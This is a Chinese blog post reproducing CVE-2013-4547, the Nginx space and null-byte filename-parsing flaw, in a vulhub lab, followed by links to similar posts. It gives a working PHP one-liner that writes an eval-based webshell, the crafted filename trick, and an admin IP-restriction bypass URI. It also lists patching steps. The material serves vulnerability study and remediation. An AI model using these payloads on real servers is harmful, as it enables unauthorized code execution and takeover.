CVE-2013-4547 Nginx 文件名逻辑漏洞

最新推荐文章于 2024-08-06 09:09:04 发布
最新推荐文章于 2024-08-06 09:09:04 发布
阅读量418 收藏 2
点赞数 5
分类专栏: 漏洞复现 文章标签: nginx 安全漏洞 信息安全 渗透测试 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/113137745
版权

目录

漏洞描述

  nginx 0.8.41至1.4.3和1.5.7之前的1.5.x允许远程攻击者通过URI中的未转义空格字符来绕过预期的限制。

影响版本

Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

漏洞环境搭建

使用vulhub直接docker一键启动环境CVE-2013-4547环境

docker快速入门以及漏洞环境搭建

下载安装好vulhub后进入/vulhub/nginx/CVE-2013-4547目录,执行以下命令启动环境

sudo docker-compose up -d

启动docker环境后访问虚拟机8080端口,出现以下页面表示启动成功
在这里插入图片描述

漏洞分析

这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:

location ~ \.php$ {
    include        fastcgi_params;

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}

正常情况下(关闭pathinfo的情况下),只有.php后缀的文件才会被发送给fastcgi解析。

而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi。

fastcgi根据SCRIPT_FILENAME的值进行解析,最后造成了解析漏洞。

所以,我们只需要上传一个空格结尾的文件,即可使PHP解析之。

再举个例子,比如很多网站限制了允许访问后台的IP:

location /admin/ {
    allow 127.0.0.1;
    deny all;
}

我们可以请求如下URI:test[0x20]/../admin/index.php,这个URI不会匹配上location后面的/admin/,也就绕过了其中的IP验证;但最后请求的是/test[0x20]/../admin/index.php文件,也就是/admin/index.php,成功访问到后台。(这个前提是需要有一个目录叫test :这是Linux系统的特点,如果有一个不存在的目录,则即使跳转到上一层,也会爆文件不存在的错误,Windows下没有这个限制)

漏洞检测

将上传的文件名修改hex值为name.gif[0x20][0x00].php
在这里插入图片描述
在这里插入图片描述
普通的浏览器打不出00 去访问的,需要通过burp修改hex为name.gif[0x20][0x00].php,即可成功访问php文件
在这里插入图片描述

漏洞利用

因为浏览器打不了\0,所以我们更换思路去getshell。
上传文件时,利用php的system函数去构建文件:

getshell.gif[0x20][0x00].php文件
一句话:

<?php system('echo "<?php @eval(\$_POST[pass]);?>" >shell.php')?>

在这里插入图片描述
然后利用burp修改hex,访问getshell.gif[0x20][0x00].php,访问过后将会在当前文件下生成shell.php

然后利用蚂剑连接将可以获取web服务器权限
在这里插入图片描述

漏洞加固

  1. 升级nginx
  2. 下载补丁:http://nginx.org/download/patch.2013.space.txt
         Nginx修复漏洞打补丁过程

参考链接

https://github.com/vulhub/vulhub/tree/master/nginx/CVE-2013-4547

凝聚力安全团队
关注
专栏目录
Nginx文件名逻辑漏洞CVE-2013-4547)漏洞复现
薛定谔嘚喵博客
04-01 182
Nginx文件名逻辑漏洞CVE-2013-4547),这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
漏洞复现之CVE-2013-4547
Blood_Pupil的博客
03-15 5308
CVE-2013-4547Nginx中间件的一个文件名解析漏洞 漏洞原理 【注:下文中[]表示字节】 以vulnhub提供的漏洞环境为例,我们首先看一下前端页面 再看一下后端的过滤 目前的情况看来我们不能传后缀名为php这一类的文件,那么我们就把文件后缀名改为jpg吧,然后上传 我们尝试访问下 看来上传成功了,我们得想办法执行,nginx不是把所有后缀名为php的文件交给fastcgi...
CVE-2013-4547 文件名逻辑漏洞
weixin_45694388的博客
07-25 1893
搭建环境,访问 8080 端口 漏洞说明: NginxNginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等。 影响版本:0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 原理: 此漏洞可导致目录跨越及代码执行, 其主要原因是错误地解析了请求的URI, 错误地
Nginx 文件名逻辑漏洞CVE-2013-4547
bqnagus
10-02 1926
vulhub-nginx 复现
Nginx文件名逻辑漏洞——CVE-2013-4547复现
最新发布
weixin_57379923的博客
08-06 385
2013年底,nginx再次爆出漏洞(CVE-2013-4547),此漏洞可导致目录跨越及代码执行,主要原因是nginx因为00截断错误地解析了请求的 URI ,将获取到用户请求的文件名解析为对应的脚本程序,导致出现权限绕过、代码执行等连带影响,从而实现getshell的过程。
Nginx文件名逻辑漏洞CVE-2013-4547
bring_coco的博客
06-09 523
一.漏洞原理 总:这个漏洞其实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 举个例子,比如,nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下: location ~ \.php$ { include fastcgi_params; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param S
【vulhub漏洞复现】CVE-2013-4547 Nginx 文件名逻辑漏洞
RexHa的博客
03-04 2638
一、漏洞详情通过%00截断绕过后缀名的限制,使上传的php内容文件被解析执行。当Nginx得到一个用户请求时,首先对url进行解析,进行正则匹配,如果匹配到以.php后缀结尾的文件名,会将请求的PHP文件交给PHP-CGI去解析。假设服务器中存在文件‘123.png ',则可以通过访问如下网址让服务器认为'123.png '的后缀为php
Nginx 文件名逻辑漏洞复现(CVE-2013-4547
W小哥
05-21 686
一、漏洞描述 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 二、漏洞原理 这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下: location ~ .php$ { include fastcgi_params; fastcgi_pass 127.0.0.1:90
Nginx文件名逻辑漏洞CVE-2013-4547)复现
君莫hacker的博客
09-20 2651
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现1. 成功访问主页2. 上传php文件3. 上传gif文件4.修改后缀,增加截断5. 访问成功6. 上传木马文件7. 修改后缀8. 命令执行成功 0x01 漏洞介绍 漏洞描述 这个漏洞其实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。这是一个nginx解析漏洞。 漏洞编号 CVE-2013-4547 受影响版本 Nginx 0.8.41~1.4.3 Ng
NginxNginx 文件名逻辑漏洞CVE-2013-4547
时乙的博客
12-08 283
这个漏洞实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
CVE-2013-4547Nginx文件名逻辑漏洞
爱吃仡坨的Blog
10-14 1015
此漏洞是利用了Nginx解析了错误的URl地址,使得绕过服务端限制解析了php文件,造成命令执行的危害php-fpm.conf中的security.limit_extensions为空使得任意后缀都可以被解析Nginx服务器将名为ggbond.php[0x20][0x00].php文件发给fastCGI,然而fastcgi在接受此文件时候只读取到ggbond.php[0x20][0x00];
Nginx 文件名逻辑漏洞CVE-2013-4547
qq_58000413的博客
03-09 413
nginx对上面的URI处理后将shell.jpg[20][00].php交给fastcgi处理,由于零截断fastcgi实际处理的文件为abc.jpg[20],这个文件需要存在fastcgi才能正常处理。在Windows环境下由于命名文件时不允许文件后缀末尾存在空格所以自动将其修复为abc.jpg,这种情况下我们只需要上传一张包含代码的名字为abc.jpg的文件就可以利用漏洞了。从而只会解析到前面的文件,以1.jpg\0.php为例,只会解析到1.jpg,假如这时里面存在木马,则可以直接代码执行。
Nginx 文件名逻辑漏洞CVE-2013-4547)复现。 新手向。小白也能听得懂的。面向小白详细讲解。配合BurpSuite新老版本抓包。
qq_24305079的博客
06-18 864
Nginx 文件名逻辑漏洞CVE-2013-4547),记录一下我的学习过程,总结一下经验,希望能给后面的人提供帮助,为了复现和成功解析PHP网页我搞了很久.我这里使用了新老版本的BurpSuite去抓包,详细过程请见下文.使用的BurpSuite版本:和CentOS 7Kali 1.0.5Vulhub预防CVE-2013-4547漏洞需要从配置和安全实践上进行多方面的改进。
Nginx 文件名逻辑漏洞 CVE-2013-4547 漏洞复现
ADummy的博客
02-25 302
Nginx 文件名逻辑漏洞CVE-2013-4547) by ADummy 0x00利用路线 ​ 上传文件后边空格—>上传文件成功—>php文件被成功解析 0x01漏洞介绍 ​ 这个漏洞其实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 影响版本 Nginx 0.8.41 ~ 1.4.3 Nginx 1.5.0 ~ 1.5.7 0x02漏洞复现 ​ 这个漏洞其实和代码执行没有太大关系,其主要
Nginx 文件名逻辑漏洞CVE-2013-4547)(Vulhub)
weixin_74985952的博客
06-20 396
Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息,从而导致文件代码执行,权限绕过等问题。利用该漏洞需要满足Nginx版本满足0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本文件上传点可以上传带空格文件名的文件服务器没有做文件重命名。
【漏洞复现】Nginx 文件名逻辑漏洞CVE-2013-4547
cj_Hydra's Blog
11-04 622
前言: 这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下: location ~ \.php$ { include fastcgi_params; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_para
Nginx CVE-2013-4547文件名逻辑漏洞
qq_43665434的博客
05-18 370
Nginx CVE-2013-4547文件名逻辑漏洞 漏洞原理:传送门 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击机(burp) 192.168.1.120 实验流程 开启漏洞靶机centos8 # 切换到vulhub目录 cd /usr/sbin/vulhub/nginx/CVE-2013-4547 # 开启docker服务 service docker start # 创建docker镜像 docker-comp
14.Nginx 文件名逻辑漏洞CVE-2013-4547
weixin_30522095的博客
10-23 939
由于博主在渗透网站时发现现在Nginx搭建的网站是越来越多 所以对Nginx的漏洞来一个全面性的复习,本次从Nginx较早的漏洞开始分析。 2013年底,nginx再次爆出漏洞(CVE-2013-4547),此漏洞可导致目录跨越及代码执行, 其影响版本为: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7,范围较广。 漏洞说明 这个漏洞其实和代码执行没有太大关系,...
nginx cve-2013-4547
04-08
nginx cve-2013-4547是指nginx服务器软件中的安全漏洞,被黑客利用可以导致服务器拒绝服务攻击。该漏洞影响nginx 1.4.0至1.4.3及1.5.0至1.5.6版本,建议用户及时升级软件版本以避免漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值